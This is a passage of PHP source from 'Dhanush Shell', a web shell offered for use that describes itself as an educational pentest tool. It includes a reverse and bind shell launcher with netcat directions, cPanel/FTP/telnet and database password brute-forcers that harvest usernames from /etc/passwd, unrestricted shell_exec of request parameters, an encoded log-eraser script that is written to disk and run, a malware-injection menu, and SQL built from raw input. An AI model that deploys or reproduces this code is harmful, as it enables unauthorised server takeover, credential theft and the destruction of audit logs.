3657 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=$OSV+Lversion");
3658 }
3659 else if($_GET['rootexploit'] == "exploitsearch")
3660 {
3661 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
3662 }
3663 else if($_GET['rootexploit'] == "shodanhq")
3664 {
3665 header("Location:http://www.shodanhq.com/exploits?q=$OSV+Lversion");
3666 }
3667 }
3668 //End of Exploit search
3669 }
3670}
3671// Connect
3672else if(isset($_REQUEST['connect']))
3673{
3674 ?>
3675 <form action='<?php echo $self; ?>' method='POST' >
3676 <table style="width:50%" align="center" >
3677 <tr>
3678 <th colspan="1" width="50px">Reverse Shell</th>
3679 <th colspan="1" width="50px">Bind Shell</th>
3680 </tr>
3681 <tr>
3682 <td>
3683 <table style="border-spacing: 6px;">
3684 <tr>
3685 <td>IP </td>
3686 <td>
3687 <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
3688 </td>
3689 </tr>
3690 <tr>
3691 <td>Port </td>
3692 <td><input style="width: 200px;" class="box" name="port" size='5' value="9891"/></td>
3693 </tr>
3694 <tr>
3695 <td style="vertical-align:top;">Use:</td>
3696 <td><select style="width: 95px;" name="lang" class="sbox">
3697 <option value="perl">Perl</option>
3698 <option value="python">Python</option>
3699 <option value="php">PHP</option>
3700 </select>
3701 <input type="submit" style="width: 90px;" class="but" value="Connect!" name="backconnect"/></td>
3702 </tr>
3703 </table> </form>
3704 </td>
3705
3706 <td style="vertical-align:top;">
3707 <form method='post' >
3708 <table style="border-spacing: 6px;">
3709 <tr>
3710 <td>Port</td>
3711 <td>
3712 <input style="width: 200px;" class="box" name="port" value="9891" />
3713 </td>
3714 </tr>
3715 <tr>
3716 <td>Password </td>
3717 <td>
3718 <input style="width: 200px;" class="box" name="passwd" value="Dhanush"/>
3719 </td>
3720 <tr>
3721 <td>Using</td>
3722 <td>
3723 <select style="width: 95px;" name="lang" id="lang" class="sbox">
3724 <option value="perl">Perl</option>
3725 <option value="c">C</option>
3726 </select>
3727 <input style="width: 90px;" class="but" type="submit" name="backdoor" value=" Bind "/></td>
3728 </tr>
3729 </table>
3730 </td>
3731 </form>
3732 </tr>
3733 <tr><td colspan=2><font color="#FF0000">Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat and give it the command 'nc <?php yourip(); ?> 9891"!</font></td></tr>
3734 </table>
3735
3736 <?php
3737 }
3738
3739else if(isset($_REQUEST['404']))
3740{
3741 ?>
3742 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('404new')"><font class=txt size="4">| Set Your 404 Page |</font></a></td>
3743 <td><a href=javascript:void(0) onClick="getdata('404page')"><font class=txt size="4">| Set Specified 404 Page |</font></a></td>
3744 </tr></table></center><br>
3745 <div id="showdata"></div>
3746 <?php
3747}
3748else if(isset($_GET['about']))
3749 { ?>
3750 <center>
3751 <p><font size=6><u>D h a n u s h</u></font><br>
3752 <font size=5>[--==Coded By Arjun==--]</font>
3753 <div style='font-family: Courier New; font-size: 10px;'><font class=txt ><pre>
3754
3755 - -- -
3756 -- -- --
3757 -- --
3758 --- ---
3759 ------
3760 ----
3761 ----
3762 ------
3763-------
3764--- --
3765 -- ---
3766 -- -----
3767 --- --- ---
3768 --- --- ---
3769-- --------- --
3770-- ------- --
3771 -- ---- --
3772 -- --- --
3773 -- -- --
3774 --- --- -- ---
3775 ------ ------
3776 ---- ----
3777
3778
3779 </pre></font></div></center>
 3780 <font class="txt">Dhanush Shell is a PHP script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerabilities present in the web server. This shell provides almost every facility that a security analyst needs for penetration testing. This is an "All In One" PHP script, so that the user does not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for educational purposes or for testing on your own server. The developer of the script is not responsible for any damage or misuse of it</font><br><br><center><font size=5>GREETZ To All Indian Hackers</font><br><font size=6>| जय महाकाल | | जय हिन्द |</font></center><br>
3781 <?php }
3782else if(isset($_GET['database']))
3783{ ?>
3784 <form onSubmit="mydatabase(server.value,username.value,password.value);return false;">
3785 <table id="datatable" style="width:90%;" cellpadding="4" align="center">
3786 <tr>
3787 <td colspan="2">Connect To Database</td>
3788 </tr>
3789 <tr>
3790 <td>Server Address :</td>
3791 <td><input type="text" class="box" name="server" value="localhost"></td>
3792 </tr>
3793 <tr>
3794 <td>Username :</td>
3795 <td><input type="text" class="box" name="username" value="root"></td>
3796 </tr>
3797 <tr>
3798 <td>Password:</td>
3799 <td><input type="text" class="box" name="password" value=""></td>
3800 </tr>
3801
3802 <tr>
3803 <td></td>
3804 <td><input type="button" onClick="mydatabase(server.value,username.value,password.value)" value=" Connect " name="executeit" class="but"></td>
3805 </tr>
3806 </table>
3807 </form>
3808 <div id="showsql"></div>
3809<?php
3810}
3811// Cpanel Cracker
3812 else if(isset($_REQUEST['cpanel']))
3813 {
3814 $cpanel_port="2082";
3815 $connect_timeout=5;
3816 ?>
3817 <center>
3818 <form method=post>
3819 <table style="width:50%;border-color:#333333;" border=1 cellpadding=4>
3820 <tr>
3821 <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
3822 </tr>
3823 <tr>
3824 <td align=center>User names</td><td align=center>Password</td>
3825 </tr>
3826 <tr>
3827 <td align=center><textarea name=username rows=25 cols=22 class=box><?php
3828 if($os != "Windows")
3829 {
3830 if(@file('/etc/passwd'))
3831 {
3832 $users = file('/etc/passwd');
3833 foreach($users as $user)
3834 {
3835 $user = explode(':', $user);
3836 echo $user[0] . "\n";
3837 }
3838 }
3839 else
3840 {
3841 $temp = "";
3842 $val1 = 0;
3843 $val2 = 1000;
3844 for(;$val1 <= $val2;$val1++)
3845 {
3846 $uid = @posix_getpwuid($val1);
3847 if ($uid)
3848 $temp .= join(':',$uid)."\n";
3849 }
3850
3851 $temp = trim($temp);
3852
3853 if($file5 = fopen("test.txt","w"))
3854 {
3855 fputs($file5,$temp);
3856 fclose($file5);
3857
3858 $file = fopen("test.txt", "r");
3859 while(!feof($file))
3860 {
3861 $s = fgets($file);
3862 $matches = array();
3863 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3864 $matches = str_replace("home/","",$matches[1]);
3865 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3866 continue;
3867 echo $matches;
3868 }
3869 fclose($file);
3870 }
3871 }
3872 }
3873
3874 ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
3875 </tr>
3876 <tr>
3877 <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
3878 </tr>
3879 <tr>
3880 <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
3881 </tr>
3882 <tr>
3883 <td align=center colspan=2><input type="submit" name="cpanelattack" value=" Go " class=but></td>
3884 </tr>
3885 </table>
3886 </form>
3887 </center>
3888 <?php
3889}
3890else if(isset($_REQUEST['malattack']))
3891{
3892 ?><input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
3893 <center><table><tr><td><a href=# onClick="getdata('malware')"><font class=txt size="4">| Malware Attack |</font></a></td>
3894 <td><a href=# onClick="getdata('codeinsert')"><font class=txt size="4">| Insert Own Code |</font></a></td></tr></table></center><br>
3895 <div id="showdata"></div>
3896 <?php
3897}
3898else if(isset($_GET["com"]))
3899{
3900 echo "<br>";
3901 ob_start();
3902 eval("phpinfo();");
3903 $b = ob_get_contents();
3904 ob_end_clean();
3905 $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
3906 $z = strpos($b,"</body>");
3907 $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
3908 echo $s_result;
3909}
3910else if(isset($_GET['execute']))
3911{
3912 $comm = $_GET['execute'];
3913 chdir($_GET['executepath']);
3914 $check = shell_exec($comm);
3915
3916 echo "<center><textarea id=showexecute cols=120 rows=20 class=box>" . $check . "</textarea></center>";
3917
3918 ?>
3919 <BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value);return false;">
3920 <input type="text" class="box" name="execute">
3921 <input type="button" onClick="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value)" value="Execute" class="but"></form></center>
3922 <?php
3923}
3924else if(isset($_GET['mycmd']))
3925{
3926 if($_GET['mycmd']=="logeraser")
3927 {
3928 $erase = gzinflate(base64_decode("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"));
3929 if(is_writable("."))
3930 {
3931 if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
3932 {
3933 fwrite($openp, $erase);
3934 fclose($openp);
3935 passthru("perl logseraser.pl linux");
3936 unlink("logseraser.pl");
3937 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
3938 }
3939 } else
3940 {
3941 if($openp = fopen("/tmp/logseraser.pl", 'w'))
3942 {
3943 fwrite($openp, $erase)or die("Error");
3944 fclose($openp);
3945 $aidx = passthru("perl logseraser.pl linux");
3946 unlink("logseraser.pl");
3947 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
3948 }
3949 }
3950 }
3951 else
3952 {
3953 $check = shell_exec($_GET['mycmd']);
3954 echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
3955 }
3956}
3957else if(isset($_GET['prototype']))
3958{
3959 echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
3960 if( $_GET['prototype'] == 'ftp' )
3961 {
3962 function BruteFun($ip,$port,$login,$pass)
3963 {
3964 $fp = @ftp_connect($ip, $port?$port:21);
3965 if(!$fp) return false;
3966 $res = @ftp_login($fp, $login, $pass);
3967 @ftp_close($fp);
3968 return $res;
3969 }
3970 }
3971 elseif( $_GET['prototype'] == 'mysql' )
3972 {
3973 function BruteFun($ip,$port,$login,$pass)
3974 {
3975 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
3976 @mysql_close($res);
3977 return $res;
3978 }
3979 }
3980 elseif( $_GET['prototype'] == 'pgsql' )
3981 {
3982 function BruteFun($ip,$port,$login,$pass)
3983 {
3984 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
3985 $res = @pg_connect($str);
3986 @pg_close($res);
3987 return $res;
3988 }
3989 }
3990
3991 $success = 0;
3992 $attempts = 0;
3993 $server = explode(":", $_GET['server']);
3994 if($_GET['type'] == 1)
3995 {
3996 $temp = @file('/etc/passwd');
3997 if( is_array($temp))
3998 foreach($temp as $line)
3999 {
4000 $line = explode(":", $line);
4001 ++$attempts;
4002 if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
4003 {
4004 $success++;
4005 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
4006 }
4007 if(@$_GET['reverse'])
4008 {
4009 $tmp = "";
4010 for($i=strlen($line[0])-1; $i>=0; --$i)
4011 $tmp .= $line[0][$i];
4012 ++$attempts;
4013 if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
4014 {
4015 $success++;
4016 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
4017 }
4018 }
4019 }
4020 }
4021 elseif($_GET['type'] == 2)
4022 {
4023 $temp = @file($_GET['dict']);
4024 if( is_array($temp) )
4025 foreach($temp as $line)
4026 {
4027 $line = trim($line);
4028 ++$attempts;
4029 if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
4030 {
4031 $success++;
4032 echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
4033 }
4034 }
4035 }
4036 echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div>";
4037}
 4038 // Connect to database and list databases
4039else if(isset($_GET["executeit"]))
4040{
4041 if(isset($_GET['username']) && isset($_GET['server']))
4042 {
4043 $dbserver = $_GET['server'];
4044 $dbuser = $_GET['username'];
4045 $dbpass = $_GET['password'];
4046 if(mysql_connect($dbserver,$dbuser,$dbpass))
4047 {
4048 setcookie("dbserver", $dbserver);
4049 setcookie("dbuser", $dbuser);
4050 setcookie("dbpass", $dbpass);
4051
4052 listdatabase();
4053 }
4054 else
4055 echo "cannotconnect";
4056 }
4057}
4058else if(isset($_GET['action']) && isset($_GET['dbname']))
4059
4060
4061 {
4062 if($_GET['action'] == "createDB")
4063 {
4064 $dbname = $_GET['dbname'];
4065 $dbserver = $_COOKIE["dbserver"];
4066 $dbuser = $_COOKIE["dbuser"];
4067 $dbpass = $_COOKIE["dbpass"];
4068 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4069 mysql_query("create database $dbname",$mysqlHandle);
4070 listdatabase();
4071 }
4072 if($_GET['action'] == 'dropDB')
4073 {
4074 $dbname = $_GET['dbname'];
4075 $dbserver = $_COOKIE["dbserver"];
4076 $dbuser = $_COOKIE["dbuser"];
4077 $dbpass = $_COOKIE["dbpass"];
4078 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4079 mysql_query("drop database $dbname",$mysqlHandle);
4080 mysql_close($mysqlHandle);
4081 listdatabase();
4082 }
4083
4084 if($_GET['action'] == 'listTables')
4085 {
4086 listtable();
4087 }
4088
4089 // Create Tables
4090 if($_GET['action'] == "createtable")
4091 {
4092 $dbserver = $_COOKIE["dbserver"];
4093 $dbuser = $_COOKIE["dbuser"];
4094 $dbpass = $_COOKIE["dbpass"];
4095 $dbname = $_GET['dbname'];
4096 $tablename = $_GET['tablename'];
4097 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4098 mysql_select_db($dbname);
4099 mysql_query("CREATE TABLE $tablename ( no INT )");
4100 listtable();
4101 }
4102
4103 // Drop Tables
4104 if($_GET['action'] == "dropTable")
4105 {
4106 $dbserver = $_COOKIE["dbserver"];
4107 $dbuser = $_COOKIE["dbuser"];
4108 $dbpass = $_COOKIE["dbpass"];
4109 $dbname = $_GET['dbname'];
4110 $tablename = $_GET['tablename'];
4111 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4112 mysql_select_db($dbname);
4113 mysql_query("drop table $tablename");
4114 listtable();
4115 }
4116
4117 // Empty Tables
4118 if($_GET['action'] == "empty")
4119 {
4120 $dbserver = $_COOKIE["dbserver"];
4121 $dbuser = $_COOKIE["dbuser"];
4122 $dbpass = $_COOKIE["dbpass"];
4123 $dbname = $_GET['dbname'];
4124 $tablename = $_GET['tablename'];
4125 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4126 mysql_select_db($dbname);
4127 mysql_query("delete from $tablename");
4128 listtable();
4129 }
4130
 4131 // Drop Field
4132 if($_GET['action'] == "dropField")
4133 {
4134 $dbserver = $_COOKIE["dbserver"];
4135 $dbuser = $_COOKIE["dbuser"];
4136 $dbpass = $_COOKIE["dbpass"];
4137 $dbname = $_GET['dbname'];
4138 $tablename = $_GET['tablename'];
4139 $fieldname = $_GET['fieldname'];
4140 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4141 mysql_select_db($dbname);
4142 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
4143 mysql_select_db( $dbname, $mysqlHandle );
4144 mysql_query( $queryStr , $mysqlHandle );
4145 listtable();
4146 }
4147
4148 if($_GET['action'] == 'viewdb')
4149 {
4150 listdatabase();
4151 }
4152
4153 // View Table Schema
4154 if($_GET['action'] == "viewSchema")
4155 {
4156 $dbserver = $_COOKIE["dbserver"];
4157 $dbuser = $_COOKIE["dbuser"];
4158 $dbpass = $_COOKIE["dbpass"];
4159 $dbname = $_GET['dbname'];
4160 $tablename = $_GET['tablename'];
4161 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4162 mysql_select_db($dbname);
4163 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4164 $pResult = mysql_query( "SHOW fields FROM $tablename" );
4165 $num = mysql_num_rows( $pResult );
4166 echo "<br><br><table align=center cellspacing=4 style='width:80%;' border=1>";
4167 echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
4168 for( $i = 0; $i < $num; $i++ )
4169 {
4170 $field = mysql_fetch_array( $pResult );
4171 echo "<tr>\n";
4172 echo "<td>".$field["Field"]."</td>\n";
4173 echo "<td>".$field["Type"]."</td>\n";
4174 echo "<td>".$field["Null"]."</td>\n";
4175 echo "<td>".$field["Key"]."</td>\n";
4176 echo "<td>".$field["Default"]."</td>\n";
4177 echo "<td>".$field["Extra"]."</td>\n";
4178 $fieldname = $field["Field"];
4179 echo "<td><a href=# onClick=\"viewtables('dropField','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>\n";
4180 echo "</tr>\n";
4181 }
4182 echo "</table>";
4183 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4184 }
4185
4186 // Execute Query
4187 if($_GET['action'] == "executequery")
4188 {
4189 $dbserver = $_COOKIE["dbserver"];
4190 $dbuser = $_COOKIE["dbuser"];
4191 $dbpass = $_COOKIE["dbpass"];
4192 $dbname = $_GET['dbname'];
4193 $tablename = $_GET['tablename'];
4194 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4195 mysql_select_db($dbname);
4196 $result = mysql_query($_GET['executemyquery']);
4197
4198 // results
4199 echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
4200
4201 $count = 0;
4202 while ($row = mysql_fetch_assoc($result))
4203 {
4204 echo "<tr>\r\n";
4205
4206 if ($count==0) // list column names
4207 {
4208 echo "<tr>\r\n";
4209 while($key = key($row))
4210 {
4211 echo "<td><b>" . $key . "</b></td>\r\n";
4212 next($row);
4213 }
4214 echo "</tr>\r\n";
4215 }
4216
4217 foreach($row as $r) // list content of column names
4218 {
4219 if ($r=='') $r = '<font >NULL</font>';
4220 echo "<td><font class=txt>" . $r . "</font></td>\r\n";
4221 }
4222 echo "</tr>\r\n";
4223 $count++;
4224 }
4225 echo "</table>\n\r<font class=txt size=3>" . $count . " rows returned.</font>\r\n</html>";
4226 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4227 }
4228
4229 // View Table Data
4230 if($_GET['action'] == "viewdata")
4231 {
4232 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
4233 $dbserver = $_COOKIE["dbserver"];
4234 $dbuser = $_COOKIE["dbuser"];
4235 $dbpass = $_COOKIE["dbpass"];
4236 $dbname = $_GET['dbname'];
4237 $tablename = $_GET['tablename'];
4238 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4239 ?>
4240 <br><br>
4241 <form>
4242 <table>
4243 <tr>
4244 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
4245 </tr>
4246 <tr>
4247 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
4248 </tr>
4249 </table>
4250 </form>
4251 <?php
4252 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4253 mysql_select_db($dbname);
4254
4255 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4256 $row = mysql_fetch_array($sql);
4257 $rowid = $row['COLUMN_NAME'];
4258
4259 echo "<br><font size=4 color =lime>Data in Table</font><br>";
4260 if( $tablename != "" )
4261 echo "<font size=3 class=txt>$dbname > $tablename</font><br>";
4262 else
4263 echo "<font size=3 class=txt>$dbname</font><br>";
4264
4265 $queryStr = "";
4266 $pag = 0;
4267 $queryStr = stripslashes( $queryStr );
4268 if( $queryStr == "" )
4269 {
4270 if(isset($_REQUEST['page']))
4271 {
4272 $res = mysql_query("select * from $tablename");
4273 $getres = mysql_num_rows($res);
4274 $coun = ceil($getres/30);
4275 if($_REQUEST['page'] != 1)
4276
4277 $pag = $_REQUEST['page'] * 30;
4278 else
4279 $pag = $_REQUEST['page'] * 30;
4280
4281 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
4282 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
4283 $arrcount = 1;
4284 $arrdata[$arrcount] = 0;
4285 while($row = mysql_fetch_array($sql))
4286 {
4287 $arrdata[$arrcount] = $row[$rowid];
4288 $arrcount++;
4289 }
4290 }
4291 else
4292 {
4293 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
4294 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
4295 $arrcount = 1;
4296 $arrdata[$arrcount] = 0;
4297 while($row = mysql_fetch_array($sql))
4298 {
4299 $arrdata[$arrcount] = $row[$rowid];
4300 $arrcount++;
4301 }
4302 }
4303 if( $orderby != "" )
4304 $queryStr .= " ORDER BY $orderby";
4305 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\"><font size=3>Schema</font></a>\n";
4306 }
4307
4308
4309 $pResult = mysql_query($queryStr );
4310 $fieldt = mysql_fetch_field($pResult);
4311 $tablename = $fieldt->table;
4312 $errMsg = mysql_error();
4313
4314 $GLOBALS[queryStr] = $queryStr;
4315
4316 if( $pResult == false )
4317 {
4318 echoQueryResult();
4319 return;
4320 }
4321 if( $pResult == 1 )
4322 {
4323 $errMsg = "Success";
4324 echoQueryResult();
4325 return;
4326 }
4327
4328 echo "<hr color='#1B1B1B'>\n";
4329
4330 $row = mysql_num_rows( $pResult );
4331 $col = mysql_num_fields( $pResult );
4332
4333 if( $row == 0 )
4334 {
4335 echo "<font size=3>No Data Exist!</font>";
4336 return;
4337 }
4338
4339 if( $rowperpage == "" ) $rowperpage = 30;
4340 if( $page == "" ) $page = 0;
4341 else $page--;
4342 mysql_data_seek( $pResult, $page * $rowperpage );
4343
4344 echo "<table cellspacing=1 cellpadding=5 border=1 align=center>\n";
4345 echo "<tr>\n";
4346 for( $i = 0; $i < $col; $i++ )
4347 {
4348 $field = mysql_fetch_field( $pResult, $i );
4349 echo "<th>";
4350 if($action == "viewdata")
4351 echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
4352 else
4353 echo $field->name."\n";
4354 echo "</th>\n";
4355 }
4356 echo "<th colspan=2>Action</th>\n";
4357 echo "</tr>\n";
4358 $num=1;
4359
4360
4361 $acount = 1;
4362
4363 for( $i = 0; $i < $rowperpage; $i++ )
4364 {
4365 $rowArray = mysql_fetch_row( $pResult );
4366 if( $rowArray == false ) break;
4367 echo "<tr>\n";
4368 $key = "";
4369 for( $j = 0; $j < $col; $j++ )
4370 {
4371 $data = $rowArray[$j];
4372
4373 $field = mysql_fetch_field( $pResult, $j );
4374 if( $field->primary_key == 1 )
4375 $key .= "&" . $field->name . "=" . $data;
4376
4377 if( strlen( $data ) > 30 )
4378 $data = substr( $data, 0, 30 ) . "...";
4379 $data = htmlspecialchars( $data );
4380 echo "<td>\n";
4381 echo "<font class=txt>$data</font>\n";
4382 echo "</td>\n";
4383 }
4384
4385 if(!is_numeric($arrdata[$acount]))
4386 echo "<td colspan=2>No Key</td>\n";
4387 else
4388 {
4389 echo "<td><a href=# onClick=\"viewtables('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>\n";
4390 echo "<td><a href=# onClick=\"viewtables('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a></td>\n";
4391 $acount++;
4392 }
4393 }
4394 echo "</tr>\n";
4395
4396
4397 echo "</table>";
4398 if($arrcount > 30)
4399 {
4400 $res = mysql_query("select * from $tablename");
4401 $getres = mysql_num_rows($res);
4402 $coun = ceil($getres/30);
4403 echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
4404 for($i=0;$i<$coun;$i++)
4405 echo "<option value=$i>$i</option>";
4406
4407 echo "</select> <input type=button onClick=\"viewtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go class=but></form>";
4408 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4409 }
4410 }
4411
4412 // Delete Table Data: action=deleteData removes a single row from a table.
// NOTE(review): every value used below arrives in the request (cookies and query
// string) and is interpolated into SQL with no escaping or quoting. The mysql_*
// extension used here was removed in PHP 7, so this branch only works on PHP 5,
// and none of the mysql_connect/mysql_query results are checked.
4413 if($_GET['action'] == "deleteData")
4414 {
 // Database credentials are carried in plain cookies; schema and table come from
 // the query string.
4415 $dbserver = $_COOKIE["dbserver"];
4416 $dbuser = $_COOKIE["dbuser"];
4417 $dbpass = $_COOKIE["dbpass"];
4418 $dbname = $_GET['dbname'];
4419 $tablename = $_GET['tablename'];
4420 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4421 mysql_select_db($dbname);
 // Look up the name of the table's PRIMARY KEY column.
4422 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4423 $row = mysql_fetch_array($sql);
4424 $row = $row['COLUMN_NAME'];
 // The key value is read from a query parameter *named after* the PK column
 // (the viewtables() JS helper below sends "&<rowid>=<value>"). If no PK column
 // was found, $row is null and the DELETE statement below is malformed.
4425 $rowid = $_GET[$row];
4426 mysql_query("delete from $tablename where $row = '$rowid'");
 // listtable() is defined elsewhere in this file (not visible here).
4427 listtable();
4428 }
4429 // Edit Table Data: action=editData renders an edit/insert form for one row.
// NOTE(review): as in the deleteData branch, credentials come from cookies and
// schema/table/key from the query string, and all of it is interpolated into SQL
// and HTML unescaped (only the cell values are passed through htmlspecialchars).
// mysql_*, mysql_list_fields, mysql_db_query and eregi_replace were all removed
// in PHP 7; the "${var}" interpolation form is deprecated since PHP 8.2.
4430 if($_GET['action'] == "editData")
4431 {
 // `global` at file scope (outside any function) has no effect.
4432 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
4433 $dbserver = $_COOKIE["dbserver"];
4434 $dbuser = $_COOKIE["dbuser"];
4435 $dbpass = $_COOKIE["dbpass"];
4436 $dbname = $_GET['dbname'];
4437 $tablename = $_GET['tablename'];
 // Navigation bar; $self is not assigned in this branch (it is set elsewhere in
 // the file, so it may be unset when this branch runs — verify).
4438 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4439 ?>
4440 <br><br>
4441 <form action="<?php echo $self; ?>" method="post">
4442 <?php
4443 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4444 mysql_select_db($dbname);
4445
 // Primary-key column name, then the key value from a GET parameter of that name.
4446 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4447 $row = mysql_fetch_array($sql);
4448 $row = $row['COLUMN_NAME'];
4449 $rowid = $_GET[$row];
4450
4451 $pResult = mysql_list_fields( $dbname, $tablename );
4452 $num = mysql_num_fields( $pResult );
4453
 // $key is assembled from $GLOBALS entries named after each PK column, but it
 // is never used after the substr() below — dead code.
